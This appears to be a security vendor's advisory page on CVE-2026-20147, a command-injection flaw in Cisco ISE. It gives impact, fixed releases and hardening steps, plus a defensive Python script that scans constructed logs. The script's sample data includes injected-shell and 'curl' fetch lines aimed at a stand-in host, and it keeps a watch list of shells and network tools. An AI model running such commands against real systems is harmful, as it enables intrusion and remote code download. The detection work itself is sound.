What is CVE-2026-20147?
CVE-2026-20147 is a remote code execution vulnerability in Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC). The flaw is insufficient validation of user-supplied input in the web management interface.
An authenticated attacker with valid administrative credentials can send a crafted HTTP request that breaks out of the application context and executes arbitrary commands on the underlying operating system.
The vulnerability carries a CVSS v3.1 base score of 9.9 (Critical), as assigned in the Cisco PSIRT advisory. Exploitation requires valid administrative credentials but is network-based, with no local access needed. Cisco's advisory notes that a successful exploit grants initial user-level shell access followed by privilege escalation to root. The vulnerability is classified under CWE-77, Improper Neutralization of Special Elements used in a Command.
The practical impact goes beyond a single compromised ISE node. ISE is the control plane for network access in the environments where it is deployed. Root on an ISE appliance lets an attacker modify authentication and authorization policy, issue or revoke endpoint access, and pivot using trust relationships ISE holds with the rest of the network.
In single-node deployments, Cisco warns the exploit can render ISE unavailable, blocking any endpoints that have not already authenticated from reaching the network until the node is restored.
What assets are affected by CVE-2026-20147?
The vulnerability affects Cisco ISE and ISE-PIC regardless of device configuration. All releases prior to the April 2026 patches are vulnerable.
Releases earlier than 3.1 have no fix and must be migrated to a supported branch. ISE-PIC has reached end-of-sale, and 3.4 is its last supported release.
An affected asset is an ISE or ISE-PIC admin web interface, typically reachable on TCP/443 of the Policy Administration Node. These interfaces belong on a management network. In practice they often get exposed to broader internal zones, and sometimes to the public internet through VPN concentrators, jump hosts, or legacy guest-access setups. Root on an ISE box means control of the identity layer, so an exposed admin console is a higher-stakes finding than most management-plane issues.
Are fixes available?
Yes. Cisco released software updates on April 15, 2026 that address this vulnerability alongside CVE-2026-20148, a related path traversal issue. Defenders should upgrade to the first fixed release for their branch: 3.1 Patch 11, 3.2 Patch 10, 3.3 Patch 11, 3.4 Patch 6, or 3.5 Patch 3. Customers running ISE or ISE-PIC on a branch earlier than 3.1 need to migrate, as no fix is being backported.
Cisco's advisory explicitly states there are no workarounds. Configuration changes cannot neutralize the flaw, and Cisco considers any interim mitigations to be temporary until an upgrade is applied.
Are there any other recommended actions to take?
Restrict administrative access to ISE and ISE-PIC management interfaces to a hardened management network. Block internet reachability to the admin console wherever it currently exists.
Enforce MFA on all ISE admin roles, and review authentication logs for unexpected admin sessions during the window before patching.
Monitor ISE nodes for unexpected child processes spawned by the web service user, and treat any anomalous outbound traffic from an ISE appliance as a high-severity signal.
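As an added example (not code from the CyCognito page, from Cisco or from the ISE product), the following Python script applies the two host-side checks recommended above to constructed log lines: child processes spawned under the web service account, and successful admin logins from outside the management network. The service account name iseadminportal, the key=value log format, the management subnet 10.10.0.0/24 and the list of suspicious child processes are all assumptions rather than documented ISE details; adapt them to what the appliance actually logs.

```python
"""Triage of constructed ISE-style host telemetry (added example, not Cisco's
or CyCognito's code). Account names, log format and subnets are assumptions."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Assumed account the web management interface runs under (hypothetical name).
WEB_SERVICE_USER = "iseadminportal"
# Interpreters and network tools a web front end has no reason to spawn directly;
# a CWE-77 command injection typically shows up as one of these under that account.
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "perl", "python", "curl", "wget", "nc"}
# Network from which admin sessions are expected (assumed management subnet).
MGMT_NETWORKS = [ip_network("10.10.0.0/24")]

# Constructed sample process-spawn events (format is assumed, not ISE's own).
PROC_LOG = """\
2026-04-16T10:01:02Z proc user=iseadminportal ppid_name=java comm=java cmd=/opt/jdk/bin/java -jar portal.jar
2026-04-16T10:01:09Z proc user=iseadminportal ppid_name=java comm=sh cmd=/bin/sh -c id
2026-04-16T10:02:11Z proc user=root ppid_name=cron comm=sh cmd=/bin/sh /etc/cron.daily/logrotate
2026-04-16T10:03:40Z proc user=iseadminportal ppid_name=sh comm=curl cmd=curl http://203.0.113.5/x
"""

# Constructed sample admin-login events.
AUTH_LOG = """\
2026-04-16T09:55:00Z admin-login user=admin src=10.10.0.15 outcome=success
2026-04-16T09:58:30Z admin-login user=admin src=198.51.100.77 outcome=failure
2026-04-16T09:59:02Z admin-login user=admin src=198.51.100.77 outcome=success
"""


@dataclass
class ProcEvent:
    ts: str
    user: str
    parent: str
    child: str
    cmdline: str


@dataclass
class AdminLogin:
    ts: str
    user: str
    src_ip: str
    outcome: str


def parse_proc_log(text):
    """Parse 'ts proc k=v ... cmd=<rest of line>' records into ProcEvent objects."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        head, _, cmd = line.partition(" cmd=")  # cmd may contain spaces
        ts, _kind, *kvs = head.split(" ")
        f = dict(kv.split("=", 1) for kv in kvs)
        events.append(ProcEvent(ts, f["user"], f["ppid_name"], f["comm"], cmd))
    return events


def parse_auth_log(text):
    """Parse 'ts admin-login k=v ...' records into AdminLogin objects."""
    logins = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, _kind, *kvs = line.split(" ")
        f = dict(kv.split("=", 1) for kv in kvs)
        logins.append(AdminLogin(ts, f["user"], f["src"], f["outcome"]))
    return logins


def flag_web_spawns(events):
    """Events where the web service account spawned an interpreter or network tool.
    Shells under other accounts (e.g. cron as root) are expected and not flagged."""
    return [e for e in events
            if e.user == WEB_SERVICE_USER and e.child in SUSPICIOUS_CHILDREN]


def flag_admin_logins(logins):
    """Successful admin logins whose source lies outside the management network."""
    return [l for l in logins if l.outcome == "success"
            and not any(ip_address(l.src_ip) in net for net in MGMT_NETWORKS)]


if __name__ == "__main__":
    for e in flag_web_spawns(parse_proc_log(PROC_LOG)):
        print(f"[proc] {e.ts} {e.user}: {e.parent} -> {e.child} ({e.cmdline})")
    for l in flag_admin_logins(parse_auth_log(AUTH_LOG)):
        print(f"[auth] {l.ts} admin '{l.user}' from {l.src_ip} outside mgmt network")
```

Run against the constructed input, the script flags the two spawns under the web service account (the sh -c and the curl it started) while ignoring the root cron shell, and flags the one successful admin login from 198.51.100.77. Both findings are the kind of signal the page says to treat as high severity on an unpatched node; the failed login from the same address is left out deliberately, since a failed attempt on its own is noise rather than evidence of a session.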
How can CyCognito help your organization?
CyCognito published an Emerging Threat Advisory for CVE-2026-20147 in the CyCognito platform and is actively researching enhanced detection capabilities for this vulnerability.
To learn how CyCognito can help your organization reduce external exposure and manage emerging threats more effectively, contact us to request a demo.